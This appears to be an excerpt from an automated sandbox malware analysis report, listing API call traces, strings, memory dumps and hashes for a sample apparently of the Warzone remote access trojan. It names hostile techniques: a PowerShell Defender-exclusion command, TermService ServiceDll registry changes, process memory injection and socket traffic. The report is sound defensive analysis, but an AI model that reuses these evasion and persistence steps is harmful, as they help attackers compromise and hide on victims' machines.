                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                                                            • ServiceDll, xrefs: 0040DCFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
                                                                            • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                            • API String ID: 1654648907-387424650
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                                                              • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                                                            • ServiceDll, xrefs: 0040D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseDispatcherExceptionFreeOpenUserValueVirtual
                                                                            • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                            • API String ID: 1557097135-387424650
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$ProcessQueryValue$AllocateFree
                                                                            • String ID: ?VA
                                                                            • API String ID: 3459632794-1028452459
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,77C30770,00000000,004156DE), ref: 00414FAF
                                                                            • WinExec.KERNEL32 ref: 00414FF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateExecFileModuleNameProcess
                                                                            • String ID: powershell Add-MpPreference -ExclusionPath
                                                                            • API String ID: 1183730998-2194938034
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID: bP@$warzoneTURBO
                                                                            • API String ID: 2809346765-1210837753
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                                                            • closesocket.WS2_32(?), ref: 004106E7
                                                                              • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                                                            • String ID: <5Ik
                                                                            • API String ID: 1908950363-1120072674
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown
                                                                            • String ID: <5Ik
                                                                            • API String ID: 572888783-1120072674
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                                                              • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000,?,00000000,00000000), ref: 0040EE92
                                                                            • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                                                              • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                                                              • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                                                              • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                                                            • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                                                            • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                                                              • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                                                              • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                                                              • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                                                            • LocalFree.KERNEL32(?), ref: 0040ED9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                                                            • String ID:
                                                                            • API String ID: 2785045919-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: a076863321ef7ccc4c591b68eded825eebc22781f92a03098618dbd5959c236d
                                                                            • Instruction ID: ddfb415597f5c8439fbd94624258b9e55a9e704b24525b94222ac27d93baa37d
                                                                            • Opcode Fuzzy Hash: a076863321ef7ccc4c591b68eded825eebc22781f92a03098618dbd5959c236d
                                                                            • Instruction Fuzzy Hash: BF418A35A006168FCB04DF68C484A6AFBB1FF49320F258699D5299B391E730FD52CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: b6f02bfebf3af1bf78a8dee34dd9bbacdad0c35d82c8b871ec49677639d9b7ab
                                                                            • Instruction ID: b828538a5baca8d7bae1f78a8cd41d5a9a9924a41ac853cec8a3bd90b04794d8
                                                                            • Opcode Fuzzy Hash: b6f02bfebf3af1bf78a8dee34dd9bbacdad0c35d82c8b871ec49677639d9b7ab
                                                                            • Instruction Fuzzy Hash: 3B41DA76600100AFCB4A9F98D944D597FB7FF8D32471A8094E2099B376DB36DC21EB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: c4082cd8e57ccba6c04ba4cfc57c2b4d58b9d6f8854e2a10daedf33274ef5863
                                                                            • Instruction ID: 0e9f5bb5379e5d735c3f900676121e924447fe428184b7c83f66bcd7000a3306
                                                                            • Opcode Fuzzy Hash: c4082cd8e57ccba6c04ba4cfc57c2b4d58b9d6f8854e2a10daedf33274ef5863
                                                                            • Instruction Fuzzy Hash: 473148363042815FDB155F68E8405AA7F72EFD6330B4581BAF509CB3A5EE318C06C3A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: b2c359f3d9162e27cd59abfa25a038803067ecb0fdef5d0008eec241e4a4b72d
                                                                            • Instruction ID: a0ae8043ef23c9d8a01466f05e9b9f8ef3aef56a15b2261d1bb939d14253d980
                                                                            • Opcode Fuzzy Hash: b2c359f3d9162e27cd59abfa25a038803067ecb0fdef5d0008eec241e4a4b72d
                                                                            • Instruction Fuzzy Hash: 4041D976600100AFCB4A9F98D944D597FB7FF8D32471A8098E2099B376DB36DC21EB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \s`q
                                                                            • API String ID: 0-3034026754
                                                                            • Opcode ID: 4f022ea62e4e5178ac0efab5332f91fb12aa3bb6fd57bab35adb870e38099f02
                                                                            • Instruction ID: b32ab77f8a319fee1cff1800056c956bd631299c03fbd7f14a058d483864dbc4
                                                                            • Opcode Fuzzy Hash: 4f022ea62e4e5178ac0efab5332f91fb12aa3bb6fd57bab35adb870e38099f02
                                                                            • Instruction Fuzzy Hash: FD21D5323449204FC769DB7DD9549297BF5EF8976430980BAE40ECB371FA21DC0187A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 7f3e71f4eedf3fb8bf08ee0df6fbced3b363c29a335498d82dc19b40c74d9cc6
                                                                            • Instruction ID: a6d4507f22df1868ab0797b41cb3f281b5116afc94aed991e4458eca564c9a37
                                                                            • Opcode Fuzzy Hash: 7f3e71f4eedf3fb8bf08ee0df6fbced3b363c29a335498d82dc19b40c74d9cc6
                                                                            • Instruction Fuzzy Hash: B531E635B04215CFDB04DFA8C959AADB7B2BF88714F204469E40ADB3A4DB719D02CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: f12be47900f5edea5fdbe03f75f6a3db009354e327dce9e9513702d17ee3ef3d
                                                                            • Instruction ID: 72999d0a96adc39df5b1c2c024db5f0c847b2e6aa191294d7f839ad10ba25d2e
                                                                            • Opcode Fuzzy Hash: f12be47900f5edea5fdbe03f75f6a3db009354e327dce9e9513702d17ee3ef3d
                                                                            • Instruction Fuzzy Hash: 2231F878B00214CFDB18DBA8D859BADB7B1BF88705F148159E40ADB3A5EB71DC01CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: b71c73226619dacdca5d0eff23a499b40293145a34c4d19a82d1d6efe2602d70
                                                                            • Instruction ID: a9c3ab12282ebb86ad4deb90028e06af142d742aca0a270e881673f4f9aca397
                                                                            • Opcode Fuzzy Hash: b71c73226619dacdca5d0eff23a499b40293145a34c4d19a82d1d6efe2602d70
                                                                            • Instruction Fuzzy Hash: 7D21A531B501148FCB049B68D925BAEBBF6AFC8B10F20005AE106DB3A4DFB1DD018BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: ac67ff90c14742bc33acf8901e75479a28055f187387a259643b03f18eb95ae7
                                                                            • Instruction ID: 99b575bc3f83ca14323aa6f28101d4c2f3047d4311568b662ea9cefcbb0e42e7
                                                                            • Opcode Fuzzy Hash: ac67ff90c14742bc33acf8901e75479a28055f187387a259643b03f18eb95ae7
                                                                            • Instruction Fuzzy Hash: BF219331B101148FD7149B68D865BAEBBE6AF89700F24405DE106DB3A4DEB19D0287E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $`q
                                                                            • API String ID: 0-1457833287
                                                                            • Opcode ID: bcb5a153f5187c92c43e0590fc24048efc177d2ed7ca961e6bbc502049085d3a
                                                                            • Instruction ID: 1de6e4d00851d91554c6a308ad0042ef39e082440ec94d9d73a12e1809bfb1f9
                                                                            • Opcode Fuzzy Hash: bcb5a153f5187c92c43e0590fc24048efc177d2ed7ca961e6bbc502049085d3a
                                                                            • Instruction Fuzzy Hash: 70014C71E042498FCB55DFB9A5456ADBBB1BB88311F2981ABC51CD7221F7308A41CBE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 80b43ee1a6e474272137094662a9050464e337bbe7b45d406a41497d48414821
                                                                            • Instruction ID: f76f0ca7e37d21b35a2a78ff1c6c8793d3d62213c02719d14b66b4808241d03c
                                                                            • Opcode Fuzzy Hash: 80b43ee1a6e474272137094662a9050464e337bbe7b45d406a41497d48414821
                                                                            • Instruction Fuzzy Hash: 020171306102149FDF14AB78DC2EB9E7BB1EB88711F118529E006DB3A4DA759805CBF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8dq
                                                                            • API String ID: 0-1567336683
                                                                            • Opcode ID: cad1096d351e63ec27c2365a4c0ee62715857fea226a725e1315c796a4ffbe7e
                                                                            • Instruction ID: ffb20e569736d4b509348ac4537ef39168f83291797bd58efb31a83c5d0a5e46
                                                                            • Opcode Fuzzy Hash: cad1096d351e63ec27c2365a4c0ee62715857fea226a725e1315c796a4ffbe7e
                                                                            • Instruction Fuzzy Hash: ADF044352002548FD706AB7DE81865ABBA9DF8936170480A9E14DCB771DB259D01CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 3e9f483965600387afff236cfda01b2d5fc7cdf12069b9e5b56d158702744217
                                                                            • Instruction ID: 1f7422a48639c3c0840e8ec736902fd00952fff1cc3a69db839031a14f87f520
                                                                            • Opcode Fuzzy Hash: 3e9f483965600387afff236cfda01b2d5fc7cdf12069b9e5b56d158702744217
                                                                            • Instruction Fuzzy Hash: 9C016D307102189FDB14AB68DC2DB9E7BB2AB88701F108419E406EB3A4DF7598048BF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9ad3b5489733175c0b5ef9bef6485dd94bba6a0977ca678fe6a8fa4c5c3d9d58
                                                                            • Instruction ID: b66b8a79f3c58a809f7eb490cd8b0df82ddd46343ea113c11b068639b408423c
                                                                            • Opcode Fuzzy Hash: 9ad3b5489733175c0b5ef9bef6485dd94bba6a0977ca678fe6a8fa4c5c3d9d58
                                                                            • Instruction Fuzzy Hash: DE422670901A05CFD320EF09D659A58BBF1FB00354F9AC199D42D8B26AE37ADCA4CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a48626f5770f0feee395344e7eef8b8753ff48ae258208e6ec55274aaee8b3a2
                                                                            • Instruction ID: 8f0864775ebc3ead53d957994b85fd767d1126bb31315decd7d79417f18c1a78
                                                                            • Opcode Fuzzy Hash: a48626f5770f0feee395344e7eef8b8753ff48ae258208e6ec55274aaee8b3a2
                                                                            • Instruction Fuzzy Hash: 3012C371901A05CFD320EF05D65DB54BBB1BB00355F8AC199D42D8F26AE37AD8A8CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 82c2956c7ad585b401ad32148cf942cf2b6c74935fbbf73eb7342b58a6b1a681
                                                                            • Instruction ID: 33c37803e632b83140c2b919f9a26a00e90f1b1761563ed0a0d6c7f9db2c5acd
                                                                            • Opcode Fuzzy Hash: 82c2956c7ad585b401ad32148cf942cf2b6c74935fbbf73eb7342b58a6b1a681
                                                                            • Instruction Fuzzy Hash: 56B19D71A042058FDB14CF58D894AAEB7B2FB88300F24C96AE45A9B751EB30EC45DB71
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.471813138.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_a1d000_Fhzejfh.jbxd
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1452a28c56cc8779072895297ad18046c5bb39bdb3f8a0f9526d245b1c91e40
                                                                            • Instruction ID: ca23a8a120ee8844ebe1e4d13d443d0d90c93bc6888a7a07af5e38fd0f5cdec5
                                                                            • Opcode Fuzzy Hash: e1452a28c56cc8779072895297ad18046c5bb39bdb3f8a0f9526d245b1c91e40
                                                                            • Instruction Fuzzy Hash: CD014C387085049FC7105B5D8815B6A7BE6FF8E340F148166FA4DC73A1EA308C0083B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6886139de282f26aacc258e7e9477c3721138542f4914a8c7b0445d26b65a96a
                                                                            • Instruction ID: 23c691a7717c5f9ae5b24ef8c54f7b627f1a7afac604b11de9e7cdc84be1b93a
                                                                            • Opcode Fuzzy Hash: 6886139de282f26aacc258e7e9477c3721138542f4914a8c7b0445d26b65a96a
                                                                            • Instruction Fuzzy Hash: E8113C38B00204CFDB14DF9CE958BAD77B0EF48315F288165E50ADB3A4E675DD458B21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b1c00f730c4d52da06dfffd67aae20220bd20f35381df704f9f4310933b2237
